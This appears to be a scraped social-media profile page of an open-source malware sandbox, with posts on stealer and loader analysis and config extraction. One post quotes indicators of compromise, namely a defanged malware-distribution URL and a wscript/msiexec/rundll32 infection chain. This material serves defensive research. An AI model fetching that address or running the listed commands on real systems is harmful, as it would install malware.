CAPE Sandbox
@CapeSandbox
Followers
4K
Following
200
Media
244
Statuses
779
Payloads or it didn't happen. https://t.co/rAVsWT6dcl
Joined April 2017
#Amatera payload extraction & direct syscall capture.
New Octowave Loader sample > Amatera Stealer. 0 VT. Proofpoint rules detect the traffic. My Yara rule detects the installer. Adobe printer driver sideloads tbb.dll, tbb.dll loads app-2.3.dll which gets stego from blood.wav, uses zxing.presentation.dll.
4
5
16
RT @abuse_ch: We're proud to announce our support for @CapeSandbox , a fully open-source malware sandbox developed and maintained by a dedi….
0
45
0
RT @marsomx_: [1/n] In the hope that it might be useful to someone, I am happy to share with the community my basic (and cheap) implementat….
0
44
0
#Lumma config & payload extraction
It is really interesting to find anti-VM techniques being used by threat actors in the wild. This is a PowerShell script protecting a #Lumma Stealer build and being spread on YouTube videos. In this case, this was enough to make @anyrun_app to fail based on Screen Resolution
0
12
39
More #BruteRatel.
#BruteRatel #Latrodectus A New JS Nasty Obfuscation #TTPs & #IOCs - Multi-Line Comments🚨. [+] JS T1059.007.[+] Msiexec T1218.007. TA abuses multi-line (/* ,*/) comments to hide malcode and bypass detections - VT detections 20/62. Distro MSI IP: tp://95.164.17[.]212/BEST[.]msi
0
3
15
#BruteRatel config & payload extraction, syscall capture #BRC4
#Latrodectus - #BruteRatel - .pdf > url > .js > .msi > .dll. 18.09.2024 👇. wscript.exe Document-21-29-08.js. msiexec.exe /V. MSI152A.tmp /DontWait. rundll32.exe C:\Users\Admin\AppData\Roaming\x64_stealth.dll, clBuildProgram. (1/3) 👇. IOC's.
1
24
71
Apologies to users of - unfortunately the server was water damaged in a data centre flood☹️. We appreciate your patience and understanding while we work on recovery🙏 Stay tuned for updates!.
6
1
27
capa v7.0 dynamic output now fully integrated in CAPE Sandbox 🎉. For example:
7
4
37
0
8
0
RT @InvokeReversing: We've uploaded our lecture on Automating Malware Triage from our Introduction to Malware Binary Triage course. Huge sh….
0
13
0
RT @ka1do9: Lightweight blog alert!. This post goes over fast Bumblebee unpacking and configuration extraction. I've come across posts wher….
0
4
0
1/ You might have noticed that my area of interest is specifically stealers and RATs 😅.Wrote the configuration extractor for #Vidar stealer
18
14
52
Proud to have my old #RedLine #Stealer config extractor featured in @CapeSandbox. A pleasure to collaborate :). Actually a deserved shoutout again to @huettenhain who taught me how to do it using byte-patterns ❤️.
1
3
22
#Nighthawk config extraction by @ka1do9 🙏.
First open-source contribution! #Nighthawk DLL configuration parser in @CapeSandbox :
0
5
13